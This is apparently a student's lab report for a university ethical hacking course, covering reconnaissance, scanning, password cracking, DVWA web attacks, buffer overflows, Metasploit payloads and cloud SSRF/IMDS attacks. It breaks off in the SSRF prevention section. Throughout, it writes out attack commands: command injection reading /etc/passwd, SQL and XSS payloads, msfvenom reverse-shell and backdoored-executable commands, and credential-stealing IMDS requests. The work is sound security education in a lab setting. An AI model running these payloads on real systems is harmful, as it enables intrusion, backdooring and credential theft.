owned this note
owned this note
Published
Linked with GitHub
**Ethical Hacking - GDT2Y3 - Sam Valashjardi (h21samva@du.se).**
===
## **Introduction:**
- This markdown documentation will show the process of completing the labs and my project assigment throughout the course.
*"The course begins with a brief description of important concepts needed for ethical hacking, such as operating systems, software, network protocols, network functions, virtualization, cloud computing and how cyber-attacks can be carried out."* [Ethical Hacking](https://www.du.se/en/study-at-du/kurser/course/?code=GDT2Y3).
## **Labs & Project Documentations.**
* **Sam Valashjardi - IT-säkerhet & mjukvarutestning :computer: 3rd year at [Dalarna university](https://du.se)**
* **Course Coordinator: Sir Lord Hans Jones :crown:**
* **Labs 1 - 5**
* **Project assigment**
---
# **Lab 1 - Get used to the lab environment (Linux, Kali, tools, etc.).**
## **1.1 Get used to the lab environment (Linux, Kali, tools, etc.)**
### **A)** *In what directory on the Linux computer is USB media storage normally found after it has been automatically mounted?*
- **USB media storage devices are typically automatically mounted in the /media directory.** ![snapshot1.1A](https://hackmd.io/_uploads/B1OCGpDKa.png)
### **B)** *Try to mount a network-share with Samba (SMB/CIFS):*
- **Here is an implementation of my network-share with samba**
![snapshot1.1B](https://hackmd.io/_uploads/Sk_FBpvFT.png)
### **C)** *What super user processes (processes that normally need root uid to be able to execute) are running as default in your Kali?*
- **ps -aux | grep -E '(/sbin/|/usr/sbin/)'**
![snapshot1.1C](https://hackmd.io/_uploads/S1LD86PYp.png)
### **D)** *List all active TCP and UDP ports that are open as default on Kali?*
- **The active UDP & TCP ports**
![snapshot1.1D](https://hackmd.io/_uploads/B1KgD6DKa.png)
---
## **1.2 Kernel params and simple make install of source**
### **A)** *What Linux kernel version is running on your Kali installation?*
- **6.5.0-kali3-amd64**
![snapshot1.2-A](https://hackmd.io/_uploads/ByFluTwFp.png)
### **B)** *What exact CPU is running in your machine? Number of processors (and cores), vendor, model name, stepping, cache size, bogomips etc.?*
- **lscpu**
![snapshot2.1-B](https://hackmd.io/_uploads/SyIr_aDFp.png)
### **C)** *What command or log file can give you information about the boot process during startup?*
- **sudo cat /var/log/boot.log.1**
![snapshot1.2-C](https://hackmd.io/_uploads/SkDIKTvYT.png)
---
## **1.3 Kernel modules**
### **A. 1)** ***What are the three commands to list, load and unload a kernel module?***
- **List** Kernel Modules: **lsmod**
- **Load** a Kernel Module: **modprobe [module_name]**
- **Unload** a Kernel Module: **modprobe -r [module_name]**
### **A. 2)** ***How can one know that the fuse kernel module is activated in the system?***
- **lsmod | grep fuse**
![snapshot3.1-B](https://hackmd.io/_uploads/BkLZPCPK6.png)
### **B. 1)** ***How did you mount and unmount your home directory?***
- First I mounted the directory with the command "h21samva@maggie.du.se: ~/remoteHome"
![snapshot3.1-B1](https://hackmd.io/_uploads/BkqE8JuKT.png)
- **For unmounting the directory I used the command 'fusermount -u remoteHome' which removed it.**
### **B. 2)** ***What are the advantages and disadvantages with SSHFS mount?***
- **Advantages:** Easy to use - Security - Flexibility - Cross-Platform Compatibility
- **Disadvantages:** Performance - Dependency on Network Stability - CPU Usage
### **C)** ***Linux Kernel***
- I downloaded the kernel from using the given guide from the instructions.
Here is a snapshot of File systems & Processor type and features (forgot to take a snapshop of Processor family).
![snapshot3.1-C-filesys](https://hackmd.io/_uploads/ryefsy_Fp.png)
![snapshot3.1-C-proc](https://hackmd.io/_uploads/ryAvjyuKp.png)
### **D)** ***What commands are usually needed to compile and install a Linux kernel?***
- **Install necessary packages:** Command: 'sudo apt-get install build-essential libncurses-dev bison flex libssl-dev libelf-dev'
- **Get the Kernel Source:** Command: 'sudo apt-get install linux-source'
- **Extract and Prepare the Kernel Source:** Command:
'tar xvf linux-source-VERSION.tar.xz
cd linux-source-VERSION'
* **Configure the Kernel:** Command: 'make menuconfig'
* **Installing the Kernel Modules:** Command: 'sudo make modules_install'
* **Install the Kernel:** Command: 'sudo make install'
* **Update GRUB and Reboot:** Command: 'sudo update-grub'
* **Verify the Kernel Version:** Command: 'uname -r'
---
## **1.4 Remote access to Kali with VNC/RDP and SSH**
### **SSH**
### **A. 1)** ***How did you check if the SSH daemon is running?***
- With the command: 'sudo systemctl status ssh'
![4.1 A1](https://hackmd.io/_uploads/r1rzgedtp.png)
### **A. 2)** ***What commands did you use to start up and stop the SSH daemon?***
- **Command for start up:** 'sudo systemctl start ssh'
- **Command for stoping:** 'sudo systemctl stop ssh'
### **Screen**
### **B)** ***How do you create a “screen”, detatch from it and at a later time (lets say from another login two weeks later) re-attach to your screen terminal?***
- To start a new screen session, I just simply type **'screen'** in the terminal.
- To detach from the screen session, press **Ctrl-A** followed by **D**.
- To re-attach to a detached screen session, I used the command: **'screen -r'**
- If you have multiple detached sessions, you can list them with screen **-ls** and then re-attach to a specific one using **screen -r [session ID]**.
### **VNC/RDP**
### **C) Voluntary task**
- It was not a simple task, had some trial and error behind it but managed to solved it in the end.
![snapshot-realvnc](https://hackmd.io/_uploads/SyjaNxuFa.png)
- First of all I installed the VNC server. **Command:** 'sudo apt-get install tightvncserver'
- After installing **RealVNC Viewer** on my home PC, I had to port forward the correct ports in **Oracle VM VirtualBox Manager**. **5901** for both guest and host.
![Untitled](https://hackmd.io/_uploads/BJX-LguK6.png)
- Then i connected to the VNC server using **[IP address of Kali machine]:[5901]**.
---
## **1.5 Remote connection with NetCat shells and upload with TFTP**
### **A)** ***What command did you use to start the netcat shell server?***
- **Command:** nc -lvp 5050
- **nc:** is the NetCat command.
- **-l:** tells NetCat to listen for incoming connections.
- **-v:** this makes NetCat operate in verbose mode, providing more details about the connection (optinal).
- **-p:** specifies the port on which NetCat will listen.
### **B)** ***What command did you use for the netcat client to connect to the netcat shell server?***
- **nc [server IP] 5050**
## **1.6 Lab feedback**
### **A)** ***Was this a relevant and appropriate lab and what about length etc?***
- This was an excellent introduction lab. I enjoyed it a lot, perfect length and some of the voluntary/optional ones were a challenge and quite fun as well.
### **B)** ***What corrections and/or improvements do you suggest for this lab?***
- I dont have a singel one. I just like everything about it. Very good lab.
---
# **Lab 2 - Information gathering and parallel hash/crypto attacks.**
## **2.1 Information gathering using DNS reconnaissance**
### **A)** *What type of information can be gathered with the DMitry tool*
- DMitry (Deepmagic Information Gathering Tool) is a command-line utility in Kali Linux designed for comprehensive information gathering about a host or domain.
![2.1-A](https://hackmd.io/_uploads/S1BDgmY56.png)
### **B.1)**
- First I ssh to my maggie@du.se and used dig to attempt a zone transfer.
**Command:** dig ns du.se
![2.1-B-1.dig ns](https://hackmd.io/_uploads/HJfyG7t96.png)
- And then to list all the authoritative nameservers for du.se @ns2.du.se i used the
**Command:** dig axfr du.se @ns2.du.se
![2.1-B-1-output ns1&2](https://hackmd.io/_uploads/HJC1QmK56.png)
### **B.2)**
- You can use the nslookup tool from your PC, as I did here on my own website
**Command:** nslookup -type=ns samvalashjardi.com
![2.1-B-2](https://hackmd.io/_uploads/S1ydN7Y5p.png)
### **C.1)**
- **Commands:**
netenum 130.243.32.0/24 > netname-ips.txt
**&**
-./bf-dns.pl -r -f netname-ips.txt | grep -v unused
![2.1-C1](https://hackmd.io/_uploads/Hk2i_7Fcp.png)
### **C.2)**
- ***"The reverse DNS brute force procedure is probably intended to be automated by the bf-dns.pl script. It most likely receives an input list of IP addresses (produced by something like netenum) and runs reverse DNS lookups on each, eliminating entries that are irrelevant or unresponsive."*** - Source ChatGPT
### **D)**
- A forward lookup brute-force using the list of hostnames from cheat file.
![2.1-C](https://hackmd.io/_uploads/ryJX8XYqa.png)
---
## **2.2 Target scanning with Nmap etc.**
### **A)**
- Well first I get this output from the command with -PN ***"Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.04 seconds"***. So I can only find **Port: 179/tcp.**
**Command:** nmap -sT -Pn 130.243.36.2
![2.2-A](https://hackmd.io/_uploads/H1NdJVFqa.png)
- All ports are in ignored state.
**Command:** nmap -sT -Pn 130.243.34.185
![2.2-A-185](https://hackmd.io/_uploads/HJ6zTV996.png)
### **B)**
- But with -sS I find **Port: 4001/tcp**
**Command:** nmap -sS 130.243.36.2
![2.2-B](https://hackmd.io/_uploads/rJw_14Kqa.png)
- All ports are in ignored state.
**Command:** nmap -sS 130.243.34.185
![2.2-B-185](https://hackmd.io/_uploads/rkt784K5a.png)
### **C)**
- This took me 26 minutes to scan! And no ports were found.
**Command:**
![2.2-C-2](https://hackmd.io/_uploads/BkZ-sNtca.png)
- All ports are in ignore state.
**Command:**
![2.2-C-185](https://hackmd.io/_uploads/SyZXsVKca.png)
### **D & E)**
- The OS that is running is most probably: **Oracle Virtualbox**
**Command:**
![2.2-D-2](https://hackmd.io/_uploads/r1g6q4tqa.png)
- All ports are in ignored state.
**Command:**
![2.2-D-185](https://hackmd.io/_uploads/HklJo4t56.png)
---
## **2.3 IP Filtering**
### **A)**
- Well I installed and used **Firewalk** script in **Nmap** with the **Command:** ***"$ sudo nmap --script=firewalk --traceroute du.se"*** which gave me the result:
![2.3-A](https://hackmd.io/_uploads/ryygNS9c6.png)
- With **Nmap** being one of the most versatile and widely used tools for network exploration and security auditing. For firewall and filter testing, specific Nmap scans like the ACK scan (-sA), Window scan (-sW), or Maimon scan (-sM) can be particularly revealing.
- **Firewalk** is more specialized tool designed for firewall rule testing. It uses a technique similar to traceroute, incrementing the TTL value to determine at which hop a packet gets dropped or filtered, helping to map out firewall rules.
### **B)**
- The **Nmap** scan with the **firewalk script** and **--traceroute** option against **du.se** has provided some insightful results:
- **Open Ports:** The scan detected that **ports 80 (HTTP) and 443 (HTTPS)** are open on du.se, which is expected for a web server hosting a website accessible via both HTTP and HTTPS protocols.
- **Firewalk Results:** The **firewalk script output** indicates that several TCP ports are blocked at the first hop (10.0.2.2), which could most likely be my local router or a firewall device. The blocked ports listed are in a wide range, including typical service ports like 1 (TCPMUX), 3-4 (unassigned), 6-7 (Echo, Spooler), 9 (Discard), 13 (Daytime), 17 (Quote of the Day), 19-20 (Character Generator and FTP Data), and others. This suggests that there's filtering in place to prevent access to these services from external sources, which is a common security measure.
- **Traceroute:** The traceroute performed using **port 80/tcp** showed two hops from my location to www.du.se, with the first hop likely being my local gateway (given the private IP address 10.0.2.2) and the second hop reaching the target server www.du.se at IP 130.243.57.42. - [Source 1](https://www.google.se/search?q=Nmap+firewalk+script+explanation&sca_esv=76c68a2d4a39925c&sxsrf=ACQVn0_4M_KQvY7F7loGU6VAKMku38Xg8Q%3A1706870428404&ei=nMa8ZZSiGKCewPAPgKaUuA0&udm=&ved=0ahUKEwiU4L_su4yEAxUgDxAIHQATBdcQ4dUDCA8&uact=5&oq=Nmap+firewalk+script+explanation&gs_lp=Egxnd3Mtd2l6LXNlcnAiIE5tYXAgZmlyZXdhbGsgc2NyaXB0IGV4cGxhbmF0aW9uMgoQABhHGNYEGLADMgoQABhHGNYEGLADMgoQABhHGNYEGLADMgoQABhHGNYEGLADMgoQABhHGNYEGLADSIIFUABYAHABeAGQAQCYAQCgAQCqAQC4AQPIAQDiAwQYACBBiAYBkAYF&sclient=gws-wiz-serp) & [Source 2](https://nmap.org/nsedoc/scripts/firewalk.html)
---
## **2.4 Break password hashes with rainbow tables**
### Reporting task
- I started with opening up ophcrack.
- Navigated to https://ophcrack.sourceforge.io/ to download the necessary [tables](https://ophcrack.sourceforge.io/tables.php).
- Tables: XP free small (380MB) - XP free fast (703MB) - Vista free (461MB)
- After downloading and extracting the files I went back to ophcrack and installed the tables.
- Then I loaded in the PWDUMP files and started to crack them.
- I then saved the files to both .txt & .csv, I found 41/46 Pwds.
- Here are the documentation
![2.4-A](https://hackmd.io/_uploads/BJkGCpki6.png)
![2.4-B](https://hackmd.io/_uploads/Sk8fAaysp.png)
![2.4-graph](https://hackmd.io/_uploads/HyyXATysa.png)
---
## **2.5 Find vulnerabilities with vulnerability scanners**
### Reporting task
- I scanned my Home PC and found various vulnerabilities. Some of them got fixed with a quick windows update and some of the other vulnerabilities are port forwarding and my Plex-server ports.
You may have to zoom in in the brower a bit in order to see better.
![2.5-A](https://hackmd.io/_uploads/HJv4yXbi6.png)
![2.5-B](https://hackmd.io/_uploads/r1nVyQboT.png)
![2.5-C](https://hackmd.io/_uploads/SybBy7Zip.png)
- And here I used **Docker Scout** to scan for vulnerabilities on the influxdb image that we used in a earlier course. Scout found 96 vulnerabilities.
![2.5-docker](https://hackmd.io/_uploads/rk5WXXWja.png)
![2.5-docker2](https://hackmd.io/_uploads/B1shXXZiT.png)
---
## **2.7 Lab feedback**
### **A) Was this a relevant and appropriate lab and what about length etc?**
- Yes absolutely. It was a really fun lab to be honest. Enjoyed every task and learned a lot, good lenght as well.
### **B) What corrections and/or improvements do you suggest for this lab?**
- I have no input. As I said, this was a really fun and good lab, enjoyed it all the way.
---
# **Lab 3 - Web application attacks**
## **3.1 Damn Vulnerable Web Application (DVWA)**
### **A) Brute Force:**
- **Login:** admin **Password:** password
**Command:** hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.56.101/1.1 http-get-form "/1.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect" -V
![3.1-A](https://hackmd.io/_uploads/BJS8eFGsT.png)
### **B) Command Injection:**
- **Command:** 192.168.56.101; cat /etc/passwd
![3.1-B](https://hackmd.io/_uploads/ryGbbtfja.png)
### **C) Cross Site Request Forgery (CSRF):**
- Finns en **session** & **Burp suite** är igång.
![3.1-C3tadenna](https://hackmd.io/_uploads/HJwtWKGi6.png)
- I have marked the changed password and after executing it, it changed. So if I send this link so someone with a active session and they execute it, it will change the password to hejsan.
![3.1-C2](https://hackmd.io/_uploads/S1RuzYzo6.png)
### **D) File Inclusion:**
- I have marked the tampering in the URL. There was a lot of different content files to mess around with.
![3.1-D](https://hackmd.io/_uploads/r12o6DXsa.png)
![3.1-D2](https://hackmd.io/_uploads/ryW2TDQi6.png)
![3.1-D3](https://hackmd.io/_uploads/HJr36w7o6.png)
### **E) File Upload:**
- So I created a php.file (code in the picture), uploaded the file and removed the '#' at the end on the URL.
![3.1-E](https://hackmd.io/_uploads/SJxurwXoa.png)
### **F) SQL Injection:**
- Following the guide and used the **Command:** 1 or ' union select user, password from users # to execute the **SQL injection**. It presented me with the usernames and hashed passwords.
![3.1-F](https://hackmd.io/_uploads/SkwOBPmsT.png)
### **G) XSS (DOM):**
- We see that the site is vulnerable to **XSS**.
We can manually change the param to 'Jiberich'
![3.1-G2](https://hackmd.io/_uploads/rydYtvmip.png)
- We get the cookie with the the script **“<script>alert(document.cookie)</script>”**
![3.1-G](https://hackmd.io/_uploads/SJJFjwXoa.png)
### **H) XSS (Reflected):**
- We use the same approach as before to get the session ID and obtain the cookie.
![3.1-H](https://hackmd.io/_uploads/Sy2Kb_Qip.png)
### **I) XSS (Stored):**
- Proof of concept
![3.1-i](https://hackmd.io/_uploads/Hy4_PO7oT.png)
- We implement the script that is seen in the picture in order to get the cookie and session ID
![3.1-i2](https://hackmd.io/_uploads/ryfz_u7jp.png)
---
## **3.2 Web Application Attacks**
### **A) SQL Injection**
#### **Show the SQL you used.**
- I used the **SQL statement 1' or'1'='1** and found that the password field is vulnerable to injection.
![3.2-A1](https://hackmd.io/_uploads/BkA4NK7oT.png)
### **B) LFI (Local File Inclusion)**
#### **Show the code you used to execute the attack.**
- First I turned on **Intercept** in Burp Suite, next I submitted a "change language" and got the **request** shown in the picture.
I modified the **selectLang=** and inserted **file:///etc/passwd** and got the **reponse**.
(you might have to zoom in a bit to see the text)
![3.2-B1](https://hackmd.io/_uploads/SJPX-IDjT.png)
### **C) RFI (Remote File Inclusion)**
#### **1) Show that you can send code to the attacked web server and thus create and access a reverse shell:**
- I used the build-in **php-reverse-shell.php** in Kali to create and access the reverse shell. Then with **Burp suites repeater** Send the php to the server as shown below.
![3.2-C1](https://hackmd.io/_uploads/rylZHh_jT.png)
- After navigating and locating the password of user **bobby**, I SSH'ed to the server and logged in the password **strongpass**.
- Afterwards I changed the password and gained root access.
![3.2-C3](https://hackmd.io/_uploads/rkepB2Oo6.png)
- Located shadow.
![3.2-C2](https://hackmd.io/_uploads/HJ_xInuoT.png)
- I have now full access to the server.
### **D) With a brief report, describe the vulnerabilities and what’s needed to prevent them.**
**SQL Injection** is a vulnerability that allows attackers to execute arbitrary SQL code on a database through the web application. This can lead to unauthorized access to sensitive data, data manipulation, and even complete database compromised.
**Mitigation:**
- Use of Prepared Statements and Parameterized Queries: These constructs ensure that SQL commands inserted by an attacker cannot alter the query's structure.
- Implementation of Stored Procedures: Properly used stored procedures can reduce the surface area for SQL injection attacks by separating data from commands.
- Input Validation: Rigorously validate all user inputs to ensure they conform to the expected format, thereby preventing malicious data from being processed.
- Adherence to the Principle of Least Privilege: Limit database permissions for the application to only what is necessary for its operation.
**Local File Inclusion (LFI)** vulnerabilities allow attackers to read or execute files on the server that should not be accessible through the web application. This could lead to information disclosure, local code execution, and server compromise.
**Mitigation:**
- Input Validation and Sanitization: Ensure all user inputs are validated against a strict set of rules that exclude file system navigation characters.
- Use of Whitelisting: Only allow inclusion of files that have been explicitly deemed safe, rather than trying to block known dangerous inputs.
- Disable Unnecessary Features: Turn off PHP directives like allow_url_include and functions that facilitate file inclusion if they are not needed.
**Remote File Inclusion (RFI)** vulnerabilities occur when web applications allow the inclusion of remote files or scripts. Attackers can exploit this to execute malicious code on the server, leading to unauthorized access, data breach, and server control.
**Mitigation:**
- Disable Remote Inclusions: Set PHP configuration options such as allow_url_fopen and allow_url_include to false to prevent the inclusion of remote files.
- Strict Input Validation: Adopt rigorous input validation techniques to ensure only intended files can be included, and prevent the use of URLs or remote paths.
- Employ Security-Focused Libraries: Use libraries and frameworks that are less susceptible to RFI, leveraging their security mechanisms to protect against such vulnerabilities.
### **E) Finally, submit the users that you find on the server as well as their passwords in plain text.**
![3.2-C4](https://hackmd.io/_uploads/r1txo3uoT.png)
---
## **3.3 Lab feedback**
### **A) Was this a relevant and appropriate lab and what about length etc?**
- Yes, it was a very relevant lab and a lot of fun as well. I learned a lot of new stuff and gained valuable knowledge and experience. I wish there would be more content like this in our education.
### **B) What corrections and/or improvements do you suggest for this lab?**
- Non that really comes to mind.
---
# **Lab 4 - Buffer-overflow attacks and exploit frameworks.**
## **4.1 Buffer exploits (bad programming)**
### **4.1.1 Theoretical question**
**Report - Theoretical introduction question.
According to the article “Secure programmer: Countering buffer overflows Preventing today's top vulnerability” above, what are the common problems with C/C++ which allow buffer overflows?**
- Using unsafe functions such as gets(), strcpy(), strcat(), scanf(), and printf() without format specifiers. These functions do not check the size of the input or output buffers and can write past their boundaries, overwriting adjacent memory locations.
- Not validating user input before processing it. User input can contain malicious data that is designed to exploit buffer overflow vulnerabilities, such as long strings, escape sequences, or shellcode.
- Making incorrect assumptions about memory layout. Some programmers may assume that the stack grows upward, that variables are aligned in a certain way, or that the compiler does not insert padding or rearrange variables. These assumptions can lead to errors when calculating buffer sizes or offsets, resulting in buffer overflows.
Some quotes from the article:
- ***"The same buffer that was used to overwrite the return address can also be used to hold a short snippet of executable code, called shellcode, that will in turn download a malicious executable, or open up a network connection, or do whatever else the attacker fancies."***
- ***"The return address controls which instructions the processor will execute when it's finished with the current function; it's meant to be some location within the calling function, but if it gets overwritten in a buffer overflow, it could point anywhere."***
### **4.1.2 Gnu/Linux Tasks.**
**Report:**
- gcc -o stack_one stack_one.c
0x496c5962
./stack_one $(python -c 'print("A" * 64 + "\x62\x59\x6c\x49")')
![4.1.2-stack_one](https://hackmd.io/_uploads/HJaAmP9o6.png)
- gcc -o stack_zero stack_zero.c
Input a string of more than 64 characters:
**AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX**
![4.1.2](https://hackmd.io/_uploads/BJUpp85sT.png)
### **4.1.3 Windows Task.**
**A):**
- So I found 2 ways of different successful attacks entering the
**Command:** **admin a** & **admin huhtgertgf**
The second command is a exact string of 16 chars which overflows the buffer.
![4.1.3 Windows Task](https://hackmd.io/_uploads/BJQUxq4hT.png)
**B):**
- By inserting **"snprintf"** instead of **"sprintf"** will result in that the buffer gets checked and access gets denied.
![snprintf](https://hackmd.io/_uploads/rybHe9Eha.png)
## **4.2 Exploit frameworks – client side exploits**
### **4.2.1 Executable payload creation.**
**A) Create a reverse TCP connect Windows PE file:**
- **Command:** sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.182.136 LPORT=31337 -f exe | sudo tee /root/msf_shell_rev_tcp1.exe > /dev/null
- **Command:** sudo mv /root/msf_shell_rev_tcp1.exe ~/msf_shell_rev_tcp1.exe
![tcp1](https://hackmd.io/_uploads/HkfyM54hT.png)
**B) Create a reverse tcp connect staged Windows PE file:**
- **Command:** sudo msfvenom -p windows/shell/reverse_tcp LHOST=192.168.182.136 LPORT=31337 -f exe | sudo tee /root/msf_shell.rev_tcp2.exe > /dev/null
- **Command:** sudo mv /root/msf_shell.rev_tcp2.exe ~/msf_shell.rev_tcp2.exe
![4.2.1 tcp2](https://hackmd.io/_uploads/Syzlz5N2a.png)
**C) What is the difference between the two payloads ”windows shell_reverse_tcp” and ”windows/shell/reverse_tcp”?**
- **Tcp1** No Encoding. Score 57. Simple reverse TCP.
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.182.136 LPORT=31337 -f exe | sudo tee /root/msf_shell_rev_tcp1.exe > /dev/null
- **Tcp2** Encoding. Score 58. Simple reverse TCP. Difference: / instead of _
sudo msfvenom -p windows/shell/reverse_tcp LHOST=192.168.182.136 LPORT=31337 -f exe | sudo tee /root/msf_shell.rev_tcp2.exe > /dev/null
- **241 bytes difference. Yandex detects tcp1 but not tcp2.**
![4.2.1-CompareC](https://hackmd.io/_uploads/B1wWz5E3T.png)
**D) Create an encoded and injected meterpreter reverse tcp connect Windows PE file.**
- **Downloaded** tftpd32.exe from
https://bitbucket.org/phjounin/tftpd64/downloads/Tftpd32-4.60-setup.exe
![tpft](https://hackmd.io/_uploads/rJubQcEnp.png)
- **Command:** msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.182.136 LPORT=31337 -f exe -k -e x86/shikata_ga_nai -i 3 -x ~/Desktop/tftpd32.exe -o ~/Desktop/tftpd32_bdoor.exe
![bdor](https://hackmd.io/_uploads/HkW1v5Ehp.png)
![tftp32](https://hackmd.io/_uploads/ByxQX9N3T.png)
**E) Explain the following 11 payload options (modules) for Meterpreter in short?**
- **Command Compromised behavior.**
windows/meterpreter/bind_ipv6_tcp **-** Acts as a server. Binds to TCP. IPv6 Communication.
windows/meterpreter/bind_nonx_tcp **-** Acts as a server. Binds to TCP. NX Disabled.
windows/meterpreter/bind_tcp **-** Acts as a server. Binds to TCP.
windows/meterpreter/find_tag **-** Finding tag in Meterpreter Payloads.
windows/meterpreter/reverse_ipv6_tcp **-** Acts as a client. Creates reverse IPv6 TCP connection.
windows/meterpreter/reverse_nonx_tcp **-** Acts as a client. Reverse TCP without payload
windows/meterpreter/reverse_ord_tcp **-** Acts as a client. Reverse TCP with payload.
windows/meterpreter/reverse_tcp **-** Acts as a client. Reverse TCP
windows/meterpreter/reverse_tcp_allports **-** Acts as a client. Reverse TCP multiple ports connect back
windows/metsvc_bind_tcp **-** Acts as a Windows service. Bind TCP. Meterpreter on tar
windows/patchupmeterpreter/bind_tcp Binds: **-** Binds TCP.
- **Meterpreter connections:**
Extensible Payload, that provides a [Command Channel] & [Control Channel] during exploitation.
**Purpose:** Execute commands on the compromised system. Example: Exfiltrating data.
Exfiltrating data: Stolen data, Login credentials, Financial information.
### **4.2.2 Connect to the exploit and PDF exploits**
**Report: Now upload this “msf.pdf” file to VirusTotal and paste the result to your report as you have done previously.**
- The result from uploading **msf.pdf** to **Virustotal.com**.
![msf](https://hackmd.io/_uploads/BJsHVhN2T.png)
### **4.2.3 Manage sessions (a meterpreter session is needed)**
**Report: Show a screen dump of one successful shell and meterpreter exploit you have performed.**
- After instaling a VM for **Windows 7** and installed **lab4-AdbeRdr930_en_US** I uploaded the **msf.pdf** file that we created in **metasploit**. Opened the pdf and got a session going. I uploaded a file as sproof aswell.
![4.2.2](https://hackmd.io/_uploads/S14tv043a.png)
![4.2.2-upload](https://hackmd.io/_uploads/BysYD0Nha.png)
## **4.3 A simple stack based 64-bit buffer overflow/overrun exploit**
**Report: Show with a screen dump that you successfully could create a reverse shell via Metasploit against a 64-bit program according to the given instructions in the task.**
- Completed the assignment in a code along session with Hans Jones.
![4.3](https://hackmd.io/_uploads/ryKMPB5oT.png)
## **4.6 Lab feedback**
### **A) Were the labs relevant and appropriate and what about length etc?**
- I have learned a lot in this lab. It's was really fun, but the hardest lab of them all in this course. Good length as well, it was fun doing the code a long with Hans. I liked "4.2.2 Connect to the exploit and PDF exploits" a lot.
### **B) What corrections and/or improvements do you suggest for these labs?**
- Windows task was a bit of a pain in the ass to get to work and understand correcly at first, but we figured it out after.
---
# **Lab 5 - Cloud, network attacks and reverse engineering.**
## **5.1.1 Cloud Scanning**
### **Tasks, questions to answer and report:**
### **A) Calculate how many potential IPv4 addresses that potentially can be scanned in a region for your data center provider of choice somewhere in Europe.**
- **Command:** python3 countips.py eu-north-1-range.txt
**Result:** 1342092
![5.1.1-A](https://hackmd.io/_uploads/HyIp0TY3a.png)
### **B) Scan a private RFC-1918 (as 10.0.0.0/16, 172.16.0.0/16 or 192.168.0.0/16) cloud or real/16 network with masscan for some ports that use TLS.**
- Scanned the 192.168.0.0 & 10.0.0.0 ips
![5.1.1-B](https://hackmd.io/_uploads/SJgCZ0KnT.png)
## **5.1.2 Cloud Bucket Discovery**
### **Tasks, questions to answer and report:**
### **A) Can you find a bucket discovery tool for Oracle Cloud Infrastructure (OCI)?**
- Yes I found my public bucket, but could not find my private.
![5.1.2-A](https://hackmd.io/_uploads/H1oELAFhp.png)
### **B) Is it possible to tell the difference between if a bucket exists and is private OR if the bucket does not exist at all?**
- With the **"Error 404"** response for the **private bucket**, it is currently difficult to distinguish between a private bucket and one that doesn't exist based mostly on this response.
To clarify this distinction, more techniques or OCI-specific error handling may be needed. As of right now, based only on this response, it is difficult to distinguish between a private bucket and one that doesn't exist. To clarify this distinction, more techniques or OCI-specific error handling may be needed.
## **5.2.1 Microsoft 365 Password Attacks**
### **Questions to answer and report:**
### **A)Find all users from the 400 username list with passwords you could recover and report it.**
- So the **Users & passwords** that I found was:
SUCCESS! john.merckle@falsimentis.com : Password123
SUCCESS! heather.allen@falsimentis.com : Lakers2020 (MFS is in use)
SUCCESS! bari.kembrey@falsimentis.com : Summer2022
![5.2.1](https://hackmd.io/_uploads/HkryrrRjp.png)
- After these 2 searches my sprays started to get locked out, even tho I had a **FireProx URL** active in the URL.
![5.2.1 - B](https://hackmd.io/_uploads/rkjyBBCjp.png)
So I had to restart **FireProx URL** again and keep searching.
### **B) If a user have MFA enabled for his/her MS 365 account, how could we potentially bypass this protection?**
- Well there is accually several ways to do so, but in the end its up to the companies to reimagine their cybersecurity landscape, keeping the vulnerabilities of MFA (specifically 2FA) in mind ([5 Ways Hackers Can Get Around Your MFA Solution](https://www.spiceworks.com/it-security/identity-access-management/articles/5-ways-hackers-can-get-around-your-mfa-solution/)) (Read this article, it's really good).
Just to mention a couple of ways are:
- **MFSSweep -** is a PowerShell script that attempts to log in to various Microsoft services using a provided set of credentials and will attempt to identify if MFA is enabled. Depending on how conditional access policies and other multi-factor authentication settings are configured, some protocols may end up being left single factor [Exploiting MFA Inconsistencies on Microsoft Services](https://www.blackhillsinfosec.com/exploiting-mfa-inconsistencies-on-microsoft-services/).
- **Simjacking -** involves hackers impersonating a user to a carrier to redirect phone-based authentication codes to a new SIM, compromising accounts such as digital banking and social media. This technique, although primitive, was effectively used by a group named Chuckling Squad to gain brief access to Twitter CEO Jack Dorsey's account, enabling them to post offensive content.
- **Cerberus malware-** targets multi-factor authentication systems like Google Authenticator, capturing one-time codes through screenshots to bypass MFA, highlighting a growing trend of sophisticated attacks designed to exploit MFA protocols and access sensitive data. This underscores the evolving challenge in cybersecurity to adapt and strengthen defenses against such advanced threats.
## **5.2.2 Cloud SSRF/IMDS Attack**
### **A) Explain what the 169.254.169.254 IP-address really is and what it is used for in the cloud?**
- The IP address **169.254.169.254** is designated in cloud settings as an automatically assigned IP. It serves as an entry point for accessing the Instance **Metadata Service (IMDS)** offered by various cloud providers. This service delivers metadata that contains details about the virtual machine instances operating in the cloud, such as the instance ID, type, region, and more.
### **B) How can you from an instance in your selected cloud (a real one) view the Instance Metadata Service (IMDS) credentials via curl?**
- To view the **Instance Metadata Service (IMDS)** credentials from an instance within a cloud environment using **curl**, you send a request to the ip address **169.254.169.254**. The exact path and method for accessing the IMDS credentials can vary slightly between cloud providers.
- For **AWS**: AWS uses the IMDSv2 (Instance Metadata Service version 2) which requires a session token for added security. So you need to retrieve a token using a PUT request:
``` TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"```
**Then**, use the token to make a request for the desired metadata:
```curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/```
- For **OCI**: We can do a
```"curl -H "Authorization: Bearer Oracle" -L http://169.254.169.254/opc/v2/instance/"``` command in order to get the metadata, I tried it on my instance and got a bunch of information.
### **C) Try the SSRF/IMDS attack on your selected cloud tenancy using the included (cloud_hack local download) POC-script ssrf .py**
- **Command:** ```http://169.254.169.254/lastest/meta-data/iam/security-credentials/falsimentis-deploy.role/```
![sam](https://hackmd.io/_uploads/BynR4-I2T.png)
### **D) How can we prevent the abuse of SSRF/IMDS attacks?**
- There are several ways in preventing **SSRF attacks**, especially those aimed at exploiting the **IMDS** in cloud enviroments, and it involves a combination of network security best practices, proper configuration, and application-level safeguards.
**Here are some examples:**
